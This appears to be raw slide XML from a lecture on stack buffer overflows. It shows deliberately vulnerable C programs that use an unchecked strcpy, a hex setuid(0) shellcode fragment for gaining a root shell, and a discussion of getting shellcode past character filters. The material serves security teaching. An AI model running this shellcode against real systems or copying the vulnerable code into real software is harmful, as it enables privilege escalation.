              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argc,char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
              <a:t>) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        char buffer[1024];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>seteuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>buffer,argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>[1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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F0B8EFD-638F-4272-8A8B-E31406420F31}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="838200"/>
            <a:ext cx="7772400" cy="6019800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In fact, the hacker can insert a code which calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>(0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> in beginning of the original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> to get the root shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>(0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> makes a program runs as if the root runs it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This segment of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is necessary for buffer overflow attacks for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>RedHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Linux 7.3 and later versions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3352800"/>
            <a:ext cx="5372100" cy="20478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600" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>(0); code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>----------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>char code[]=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        "\x31\xc0"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>xorl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>eax,%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        "\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>xorl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>ebx,%ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        "\xb0\x17"                      /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> $0x17,%al        */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>\x80";                     /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> $0x80             */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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8CB31094-B405-4B68-B9DF-CE927B45E253}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pass through filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Programs may filter some characters or convert characters into other characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For example, a program may convert small letters into capital letters before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>().</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>exploit3.c no longer works as the normal shell code, which contains “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”, will be modified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2667000"/>
            <a:ext cx="6324600" cy="280076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600" dirty="0" smtClean="0"/>
              <a:t>#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>ctype.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argc,int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
              <a:t>) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        char buffer[1024];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
              <a:t>) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>=0;i&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>[1][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>toupper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>[1][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>buffer,argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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CD5A02F6-22F1-41BA-8DEE-C0806004D13B}" type="slidenum">
